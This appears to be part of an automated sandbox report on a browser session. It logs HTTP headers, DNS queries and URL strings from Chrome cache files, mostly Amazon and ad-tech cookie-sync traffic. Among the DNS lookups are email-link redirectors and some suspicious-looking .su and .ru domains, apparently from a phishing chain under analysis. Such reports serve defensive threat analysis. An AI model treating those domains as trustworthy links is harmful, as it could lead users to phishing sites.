Source: global trafficHTTP traffic detected: GET /s/ecm3?ex=bluekai.com&id=$_BK_UUID HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U; ad-privacy=0
Source: global trafficHTTP traffic detected: GET /sync/put/amazon?amazonid=55baee24-b702-4cc6-ad0d-99fabac100f1&redir=https%3A%2F%2Faax-eu.amazon-adsystem.com%2Fs%2Fecm3%3Fex%3Daudex.com%26id%3D55baee24-b702-4cc6-ad0d-99fabac100f1 HTTP/1.1Host: audex.userreport.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync_a9/val=G0hb0S_9R-uF3jeZDvl1pA&redirect=https://aax-eu.amazon-adsystem.com/s/ecm3?ex=bidswitch.com&id=${UUID}&gdpr_consent= HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: redirect.aecdaily.com
Source: global trafficDNS traffic detected: DNS query: url.us.m.mimecastprotect.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: url6.mailanyone.net
Source: global trafficDNS traffic detected: DNS query: specialpoint.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: nkoc4.ancolabi.su
Source: global trafficDNS traffic detected: DNS query: iic.jaishict.ru
Source: global trafficDNS traffic detected: DNS query: www.amazon.ae
Source: global trafficDNS traffic detected: DNS query: images-eu.ssl-images-amazon.com
Source: global trafficDNS traffic detected: DNS query: m.media-amazon.com
Source: global trafficDNS traffic detected: DNS query: completion.amazon.com
Source: global trafficDNS traffic detected: DNS query: unagi-eu.amazon.com
Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.ae
Source: global trafficDNS traffic detected: DNS query: completion.amazon.ae
Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon.ae
Source: global trafficDNS traffic detected: DNS query: unagi.amazon.ae
Source: global trafficDNS traffic detected: DNS query: aax-eu.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: match.360yield.com
Source: global trafficDNS traffic detected: DNS query: redirect.prod.experiment.routing.cloudfront.aws.a2z.com
Source: global trafficDNS traffic detected: DNS query: audex.userreport.com
Source: global trafficDNS traffic detected: DNS query: rd.frontend.weborama.fr
Source: global trafficDNS traffic detected: DNS query: rtb-csync.smartadserver.com
Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
Source: global trafficDNS traffic detected: DNS query: pbs.yahoo.com
Source: global trafficDNS traffic detected: DNS query: capi.connatix.com
Source: global trafficDNS traffic detected: DNS query: amazon.partners.tremorhub.com
Source: global trafficDNS traffic detected: DNS query: public-prod-dspcookiematching.dmxleo.com
Source: global trafficDNS traffic detected: DNS query: ads.stickyadstv.com
Source: global trafficDNS traffic detected: DNS query: a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: sync.rfp.fout.jp
Source: global trafficDNS traffic detected: DNS query: beacon.krxd.net
Source: global trafficDNS traffic detected: DNS query: s.amazon-adsystem.com
Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
Source: global trafficDNS traffic detected: DNS query: match.sharethrough.com
Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: odr.mookie1.com
Source: global trafficDNS traffic detected: DNS query: c1.adform.net
Source: global trafficDNS traffic detected: DNS query: bs.serving-sys.com
Source: global trafficDNS traffic detected: DNS query: cookie-matching.mediarithmics.com
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: usermatch.krxd.net
Source: global trafficDNS traffic detected: DNS query: csync.loopme.me
Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
Source: global trafficDNS traffic detected: DNS query: ssum-sec.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: lm.serving-sys.com
Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
Source: global trafficDNS traffic detected: DNS query: uipglob.semasio.net
Source: global trafficDNS traffic detected: DNS query: unagi-na.amazon.com
Source: global trafficDNS traffic detected: DNS query: crb.kargo.com
Source: global trafficDNS traffic detected: DNS query: uipus.semasio.net
Source: global trafficDNS traffic detected: DNS query: usersync.gumgum.com
Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: token.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: loadus.exelator.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: sync-amazon.ads.yieldmo.com
Source: global trafficDNS traffic detected: DNS query: sync.sxp.smartclip.net
Source: global trafficDNS traffic detected: DNS query: image6.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: static.siege-amazon.com
Source: global trafficDNS traffic detected: DNS query: abcfb99af32569473cc2f16a61840d687.profile.hyd57-p6.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: www.amazon.de
Source: global trafficDNS traffic detected: DNS query: fls-eu.amazon.com
Source: global trafficDNS traffic detected: DNS query: d1nruqhae353qc.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: d2h8zr0m6mus4x.cloudfront.net
Source: global trafficDNS traffic detected: DNS query: images-na.ssl-images-amazon.com
Source: global trafficDNS traffic detected: DNS query: a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net
Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 13:23:21 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: OhOIsEBqdqMmA/gFNvNJhquyOh7KTXaZvzE=$aQ7QSXVuHcZrctx7Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYPguTDiW7%2FxNLOA2DSmLrb2Jbu4T6P%2BKbDMB3526MdlwChyc2UAwEg4o%2BEuY%2BWkbIyRpHDjNhW9cCg3urHyQGPclvfXJqf092Vygp4QeUeWYuABE4ckfoQ4hFe2qy0ztLIc"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b20c78b3ac332e2-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Aug 2024 13:23:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nEKbNGwpenXs%2BXA1xBvg2zMoy5IkBM08lUZm73zMz%2F7F7FT9W4p4OTFTcc%2FpIL9gW%2FPP3EgHBJ7W0dv2qP87iok%2B5kdrKJ6zntv1%2Bnf7zu%2FNQoEbFoT8QV%2Be3b%2F8g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400CF-Cache-Status: HITAge: 1770Server: cloudflareCF-RAY: 8b20c78eff25c402-EWR
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:23:51 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: Z7CSXMPKVZE7X40G5MTEcontent-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffAccept-CH-Lifetime: 86400X-XSS-Protection: 1;Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 1e604122efa69acb57f0b5ccc10d9de6.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: FbODZs971hYDWoXL6XujcnRmEpuziBVvtZ-bFfHHOqJ7MbLY9cRwoA==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:23:56 GMTContent-Length: 29Connection: closex-amz-rid: 9KZD9K85BBX6RZ4VNSTKx-amzn-RequestId: 7901d90d-6c76-44f3-8a56-50459e901df8Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:09 GMTContent-Length: 29Connection: closex-amz-rid: DSVQ90Y2ZEPRGV4JCWZJx-amzn-RequestId: 88117560-d800-4579-82c9-27f9c017715bVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:24:11 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: TBFAGDR8G7HC5KYKN5HGX-Content-Type-Options: nosniffContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400X-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 818c6aa3ba5cbb6c0be8757bc2002810.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: 92x3k1otcvbFPGjWSpLOI-8ixp6ktQ6sY50M4O7phCV_MA4gKWlGcg==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Aug 2024 13:24:13 GMTContent-Length: 9Connection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:14 GMTContent-Length: 29Connection: closex-amz-rid: W4Y9BBPVQ4XNSDQ2YDV5x-amzn-RequestId: 8521eb4b-82f5-44a6-9e08-2049253bd04dVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:24 GMTContent-Length: 29Connection: closex-amz-rid: A3AGZC85JZ06HJV3QPENx-amzn-RequestId: 380abcfc-324b-441e-a9f9-3adc02351ad5Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:24:26 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: XZ71X0H3DD40GTXTVFY6X-Content-Type-Options: nosniffContent-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/X-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 95e331271d583b113f2793246bc6205c.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: S0mgZfxvM3W_A3G_pIOOvFOUbgg6loJQQ37HJe6Vooy7W7rKeXZuUg==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:30 GMTContent-Length: 29Connection: closex-amz-rid: V2VGEJWGF5MZHRYEQS4Xx-amzn-RequestId: b6b3a74c-76d6-44c8-bd79-3e9e08bf516fVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:24:43 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: 6ZX6ZHF10K7Y14VBZKZ1X-Content-Type-Options: nosniffcontent-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/X-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 7cc8e1a489398403da487298ad363b2a.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: TL_OtaOU6Zw2zM0uDulcWke0QXMA1wXQMOTpRsOpBVjsAOPyFJ5UYw==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:47 GMTContent-Length: 29Connection: closex-amz-rid: SC8B28XZQHG46Y9QVZB9x-amzn-RequestId: f2dc5aa8-8451-4bc9-a3c4-6bea9983c6ceVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:48 GMTContent-Length: 29Connection: closex-amz-rid: 2WEJAB2DMTE1DFDV5M9Mx-amzn-RequestId: 405cdfce-1c95-4592-990a-d6c4544d5be7Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:24:53 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: 9AH7T2NY5YHKY5MFDZ4PAccept-CH-Lifetime: 86400Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/content-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/X-Content-Type-Options: nosniffAccept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionX-XSS-Protection: 1;Strict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 9a81383d5a4095cd87ee33985e4b2bf8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: nhKdaRWn6zHYA4jS2-kVJqgPANdAd5UwUk3rqd00Sn_pBh4nJYDeRw==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:53 GMTContent-Length: 29Connection: closex-amz-rid: 1TPB0HMDGSWNYTR1FQ2Gx-amzn-RequestId: a93849e4-e2d9-4fa7-84fd-c085bfc4ffb6Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:24:55 GMTContent-Length: 29Connection: closex-amz-rid: JJ3HCF5V1CRBDNX80056x-amzn-RequestId: 7662770f-01ad-4791-b031-17c63ac559cfVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonTransfer-Encoding: chunkedConnection: closeServer: ServerDate: Mon, 12 Aug 2024 13:25:04 GMTVary: Content-Type,Accept-Encoding,User-AgentX-Frame-Options: SAMEORIGINx-amz-rid: BBQJY90VMYR0XDZZ890FX-Content-Type-Options: nosniffcontent-security-policy-report-only: default-src 'self' blob: https: data: mediastream: 'unsafe-eval' 'unsafe-inline';report-uri https://metrics.media-amazon.com/Accept-CH-Lifetime: 86400Content-Security-Policy: upgrade-insecure-requests;report-uri https://metrics.media-amazon.com/X-XSS-Protection: 1;Accept-CH: ect,rtt,downlink,device-memory,sec-ch-device-memory,viewport-width,sec-ch-viewport-width,dpr,sec-ch-dpr,sec-ch-ua-platform,sec-ch-ua-platform-versionStrict-Transport-Security: max-age=47474747; includeSubDomains; preloadX-Cache: Error from cloudfrontVia: 1.1 3c5b664ba8ab85923bc039b2acf98430.cloudfront.net (CloudFront)X-Amz-Cf-Pop: AMS58-P2Alt-Svc: h3=":443"; ma=86400X-Amz-Cf-Id: -u6I4qFNtAK8KAX7exRVa5hcyrVNPYwWLrvNlgITwH-qboYg9R3KUg==
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:25:07 GMTContent-Length: 29Connection: closex-amz-rid: G49KJJ8570EAPFRWAKVMx-amzn-RequestId: eee778ad-9a81-451c-9adf-e1ee67296906Vary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ServerDate: Mon, 12 Aug 2024 13:25:22 GMTContent-Length: 29Connection: closex-amz-rid: GN2SA0X0W1TB396GR9CTx-amzn-RequestId: b31bd360-3a38-4502-9c8b-85e8c54478abVary: Content-Type,Accept-Encoding,User-AgentStrict-Transport-Security: max-age=47474747; includeSubDomains; preload
Source: chromecache_992.8.drString found in binary or memory: http://browserhacks.com/#hack-e71d8692f65334173fee715c222cb805
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://cv.iptc.org/newscodes/digitalsourcetype/compositeWithTrainedAlgorithmicMedia
Source: chromecache_828.8.dr, chromecache_1309.8.drString found in binary or memory: http://jquery.com/
Source: chromecache_828.8.dr, chromecache_1309.8.drString found in binary or memory: http://jquery.org/license
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://ocsp.digicert.com0A
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: http://opensource.org/licenses/BSD-3-Clause
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://pki-crl.symauth.com/ca_7a5c3a0c73117406add19312bc1bc23f/LatestCRL.crl07
Source: chromecache_1453.8.dr, chromecache_940.8.drString found in binary or memory: http://pki-ocsp.symauth.com0
Source: chromecache_1309.8.drString found in binary or memory: http://sizzlejs.com/
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: http://tools.ietf.org/html/rfc2397
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: http://wiki.whatwg.org/wiki/Crypto
Source: chromecache_1506.8.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_992.8.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: chromecache_992.8.drString found in binary or memory: http://www.whatwg.org/specs/web-apps/current-work/multipage/comms.html#crossDocumentMessages
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3175#c4
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=885597.
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://code.amazon.com/packages/KatalMetricsExtension
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://code.amazon.com/packages/SushiJavaScriptClient/blobs/mainline/--/javascript/sushi-client.js
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://code.amazon.com/packages/SushiJavaScriptClient/blobs/mainline/--/javascript/transportation-c
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://code.google.com/p/closure-compiler/source/browse/trunk/src/com/google/debugging/sourcemap/Ba
Source: chromecache_1202.8.drString found in binary or memory: https://d2h8zr0m6mus4x.cloudfront.net/primesignup
Source: chromecache_1210.8.drString found in binary or memory: https://d2h8zr0m6mus4x.cloudfront.net/primesignup/package.json
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/Event
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/Performance/getEntries
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/Using_XMLHttpRequest#browser_compati
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Number/isInteger
Source: chromecache_992.8.drString found in binary or memory: https://developer.mozilla.org/en/DOM/window.postMessage
Source: chromecache_992.8.drString found in binary or memory: https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_Dimension.html
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit#heading=h.535es
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit?pli=1#
Source: chromecache_971.8.dr, chromecache_829.8.dr, chromecache_1300.8.drString found in binary or memory: https://github.com/facebook/regenerator/blob/main/LICENSE
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://github.com/mozilla/source-map/issues/16
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://github.com/mozilla/source-map/issues/30
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://github.com/mozilla/source-map/pull/31
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://github.com/promises-aplus/promises-spec#the-promise-resolution-procedure
Source: chromecache_992.8.drString found in binary or memory: https://github.com/webpack-contrib/style-loader/issues/177
Source: chromecache_1061.8.drString found in binary or memory: https://images-eu.ssl-images-amazon.com/images/I/31PW3lLCbrL.js?xcp
Source: chromecache_647.8.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/navcart/spinner-white._V4_.gif)
Source: chromecache_1210.8.drString found in binary or memory: https://images-na.ssl-images-amazon.com/images/G/01/payments-portal/r1/loading-4x._CB338200758_.gif
Source: chromecache_1210.8.drString found in binary or memory: https://issues.amazon.com/PrimeDSP-1081
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://issues.amazon.com/issues/KAT-1534)
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://issues.amazon.com/issues/KAT-875
Source: chromecache_992.8.dr, chromecache_873.8.drString found in binary or memory: https://issues.amazon.com/issues/KAT-876
Source: chromecache_821.8.drString found in binary or memory: https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png
Source: chromecache_821.8.drString found in binary or memory: https://m.media-amazon.com/images/G/01/ad-feedback/info_icon_1Xsprite.png&quot;)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/-0k$2FlUkg9tyD3.png)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/-NcRiM84u1IwoUa.gif)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/2SazJx$EeTHfhMN.woff2)
Source: chromecache_1261.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/7eHlJ0EDZSYjbs0.gif)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/CKWYNOHAO2meoCm.png)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/CjbL$jCCegyfqZ7.woff)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/Dv1WQ5DdeMS5qP7.woff2)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/HUihy0LFGrc$BRd.png)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/JJsp0ZvgpfwzJM6.woff)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/JT89MwO$JunoYts.png)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/KFPk-9IF4FqAqY-.woff2)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/KwhNPG8Jz-Vz2X7.woff2)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/MV5yNztdnPUc5FB.png);-webkit-background-size:512px
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/McBZv0ZvnbehkIx.png);background-repeat:no-repeat;background
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/VjTR4RqBzY0mUYx.woff2)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/WOnTLzkiaEccV7F.woff2)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/XIvhNCZAsrT80Wz.woff)
Source: chromecache_476.8.drString found in binary or memory: https://m.media-amazon.com/images/S/sash/YAEPfuhs1l-argd.woff)
